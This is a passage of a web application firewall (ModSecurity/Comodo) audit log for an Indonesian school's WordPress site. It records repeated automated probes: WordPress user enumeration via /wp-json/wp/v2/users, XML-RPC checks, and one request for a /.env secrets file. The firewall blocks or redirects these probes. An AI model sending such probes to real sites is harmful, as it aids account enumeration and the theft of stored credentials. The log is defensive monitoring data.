Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --891bca6e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746750524065154 6228 (- - -) Stopwatch2: 1746750524065154 6228; combined=4584, p1=605, p2=3702, p3=30, p4=33, p5=125, sr=130, sw=89, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --891bca6e-Z-- --dad87b24-A-- [09/May/2025:07:32:42 +0700] aB1NKi-fAO47ojYKsMoYXwAAAEo 103.236.140.4 44048 103.236.140.4 8181 --dad87b24-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dad87b24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dad87b24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746750762927182 2941 (- - -) Stopwatch2: 1746750762927182 2941; combined=1218, p1=444, p2=741, p3=0, p4=0, p5=32, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dad87b24-Z-- --ee735e08-A-- [09/May/2025:07:32:50 +0700] aB1NMi-fAO47ojYKsMoYZwAAAEI 103.236.140.4 44120 103.236.140.4 8181 --ee735e08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.25 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ee735e08-C-- demo.sayHello --ee735e08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee735e08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746750770247520 6092 (- - -) Stopwatch2: 1746750770247520 6092; combined=4458, p1=593, p2=3524, p3=35, p4=34, p5=150, sr=127, sw=122, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee735e08-Z-- --d665d043-A-- [09/May/2025:08:02:32 +0700] aB1UKFoC-7ITMWTA_c97_AAAANA 103.236.140.4 45922 103.236.140.4 8181 --d665d043-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d665d043-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d665d043-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746752552903569 2816 (- - -) Stopwatch2: 1746752552903569 2816; combined=1257, p1=438, p2=788, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d665d043-Z-- --c3b17353-A-- [09/May/2025:08:02:43 +0700] aB1UMx6q_ZMebht3q15VigAAAIU 103.236.140.4 45926 103.236.140.4 8181 --c3b17353-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.53 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c3b17353-C-- demo.sayHello --c3b17353-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3b17353-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746752563156709 4653 (- - -) Stopwatch2: 1746752563156709 4653; combined=3600, p1=453, p2=2949, p3=24, p4=25, p5=87, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3b17353-Z-- --09967677-A-- [09/May/2025:08:07:20 +0700] aB1VSFqQ1nOVx9fWpZTDrQAAABM 103.236.140.4 45956 103.236.140.4 8181 --09967677-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --09967677-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09967677-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746752840766127 3059 (- - -) Stopwatch2: 1746752840766127 3059; combined=1295, p1=442, p2=824, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09967677-Z-- --aaf44317-A-- [09/May/2025:08:07:29 +0700] aB1VUVqQ1nOVx9fWpZTDrwAAABc 103.236.140.4 45960 103.236.140.4 8181 --aaf44317-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aaf44317-C-- demo.sayHello --aaf44317-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aaf44317-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746752849546455 4926 (- - -) Stopwatch2: 1746752849546455 4926; combined=3752, p1=432, p2=3113, p3=25, p4=24, p5=92, sr=65, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aaf44317-Z-- --774b387a-A-- [09/May/2025:08:30:01 +0700] aB1amS-fAO47ojYKsMoY9gAAAEE 103.236.140.4 46144 103.236.140.4 8181 --774b387a-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 64.226.78.121 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 64.226.78.121 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --774b387a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --774b387a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746754201471307 854 (- - -) Stopwatch2: 1746754201471307 854; combined=315, p1=280, p2=0, p3=0, p4=0, p5=34, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --774b387a-Z-- --9df47253-A-- [09/May/2025:08:30:02 +0700] aB1amloC-7ITMWTA_c98CQAAAMk 103.236.140.4 46146 103.236.140.4 8181 --9df47253-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9df47253-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9df47253-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746754202642244 2826 (- - -) Stopwatch2: 1746754202642244 2826; combined=1264, p1=439, p2=794, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9df47253-Z-- --75008128-A-- [09/May/2025:08:30:06 +0700] aB1anlqQ1nOVx9fWpZTDxAAAABA 103.236.140.4 46158 103.236.140.4 8181 --75008128-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.231 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --75008128-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75008128-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746754206692505 2413 (- - -) Stopwatch2: 1746754206692505 2413; combined=1171, p1=407, p2=730, p3=0, p4=0, p5=34, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75008128-Z-- --8ae1d458-A-- [09/May/2025:08:30:10 +0700] aB1aoi-fAO47ojYKsMoY9wAAAEU 103.236.140.4 46164 103.236.140.4 8181 --8ae1d458-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8ae1d458-C-- demo.sayHello --8ae1d458-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ae1d458-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746754210115390 4517 (- - -) Stopwatch2: 1746754210115390 4517; combined=3486, p1=447, p2=2846, p3=21, p4=24, p5=87, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ae1d458-Z-- --08b3b630-A-- [09/May/2025:08:30:11 +0700] aB1aox6q_ZMebht3q15VnwAAAJc 103.236.140.4 46168 103.236.140.4 8181 --08b3b630-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.231 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --08b3b630-C-- demo.sayHello --08b3b630-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --08b3b630-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746754211965748 4821 (- - -) Stopwatch2: 1746754211965748 4821; combined=3632, p1=421, p2=2994, p3=21, p4=22, p5=100, sr=66, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08b3b630-Z-- --ca4fd41a-A-- [09/May/2025:08:42:38 +0700] aB1djlqQ1nOVx9fWpZTD4wAAAAw 103.236.140.4 46284 103.236.140.4 8181 --ca4fd41a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ca4fd41a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca4fd41a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746754958850781 3025 (- - -) Stopwatch2: 1746754958850781 3025; combined=1307, p1=450, p2=828, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca4fd41a-Z-- --e010f56a-A-- [09/May/2025:08:42:46 +0700] aB1dli-fAO47ojYKsMoY-QAAAEc 103.236.140.4 46290 103.236.140.4 8181 --e010f56a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.239 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e010f56a-C-- demo.sayHello --e010f56a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e010f56a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746754966100828 5336 (- - -) Stopwatch2: 1746754966100828 5336; combined=3993, p1=476, p2=3301, p3=24, p4=29, p5=95, sr=66, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e010f56a-Z-- --11fbb86d-A-- [09/May/2025:08:43:58 +0700] aB1d3lqQ1nOVx9fWpZTD5gAAAA8 103.236.140.4 46296 103.236.140.4 8181 --11fbb86d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.68 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --11fbb86d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11fbb86d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746755038567334 3385 (- - -) Stopwatch2: 1746755038567334 3385; combined=1427, p1=481, p2=911, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11fbb86d-Z-- --e2471a7c-A-- [09/May/2025:08:44:03 +0700] aB1d4x6q_ZMebht3q15VpgAAAIg 103.236.140.4 46300 103.236.140.4 8181 --e2471a7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.68 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e2471a7c-C-- demo.sayHello --e2471a7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2471a7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746755043892366 6193 (- - -) Stopwatch2: 1746755043892366 6193; combined=4442, p1=551, p2=3634, p3=38, p4=34, p5=106, sr=74, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2471a7c-Z-- --4103d267-A-- [09/May/2025:08:51:43 +0700] aB1fry-fAO47ojYKsMoY_wAAAFI 103.236.140.4 46328 103.236.140.4 8181 --4103d267-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4103d267-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4103d267-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746755503356693 3063 (- - -) Stopwatch2: 1746755503356693 3063; combined=1353, p1=505, p2=819, p3=0, p4=0, p5=29, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4103d267-Z-- --d1b0f819-A-- [09/May/2025:08:51:50 +0700] aB1fth6q_ZMebht3q15VqgAAAI0 103.236.140.4 46332 103.236.140.4 8181 --d1b0f819-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d1b0f819-C-- demo.sayHello --d1b0f819-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1b0f819-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file 